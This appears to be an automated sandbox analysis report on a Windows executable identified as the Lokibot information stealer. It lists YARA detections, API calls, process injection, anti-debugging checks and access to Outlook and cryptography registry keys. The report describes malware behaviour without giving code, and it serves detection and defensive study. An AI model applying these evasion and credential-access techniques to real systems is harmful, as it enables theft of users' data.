              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_004030E3
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00406043
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00404618
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_0040681A
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10014844
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000C47B
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10013D60
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000C96F
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000CD87
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000D1BC
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000F1CD
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_100169CC
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000D5F1
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10015AB1
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_100142D2
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00404B22 appears 54 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00412093 appears 40 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 0041219C appears 90 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00405B6F appears 84 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00404BEE appears 56 times
              Source: U001P56ybm.exe, 00000000.00000003.285538431.0000000002AA6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exe, 00000000.00000003.284071269.0000000002C3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exe | ReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File read: C:\Users\user\Desktop\U001P56ybm.exe
              Source: U001P56ybm.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 2_2_0040650A
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 2_1_0040650A
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File created: C:\Users\user\AppData\Local\Temp\nsi3BDC.tmp
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/4@0/1
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar, 0_2_00402012
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040411B
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: Binary string: wntdll.pdbUGP source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp

              Data Obfuscation:

              Yara detected aPLib compressed binary
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10011705 push ecx; ret 0_2_10011718
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_00402AC0 push eax; ret 2_1_00402AD4
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_00402AC0 push eax; ret 2_1_00402AFC
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405C49
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File created: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\U001P56ybm.exe | TID: 5604 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00402630 FindFirstFileA,0_2_00402630
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_1_00403D74
Source: C:\Users\user\Desktop\U001P56ybm.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10010C55 IsDebuggerPresent,0_2_10010C55
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10013280 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10013280
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,0_2_10001000
Source: C:\Users\user\Desktop\U001P56ybm.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h] 2_2_0040317B
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_0040317B mov eax, dword ptr fs:[00000030h] 2_1_0040317B
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000EE31 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000EE31

              HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\U001P56ybm.exe | Memory written: C:\Users\user\Desktop\U001P56ybm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\U001P56ybm.exe | Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10010E55 cpuid 0_2_10010E55
Source: C:\Users\user\Desktop\U001P56ybm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_0040594D
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00406069 GetUserNameW,2_2_00406069

              Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
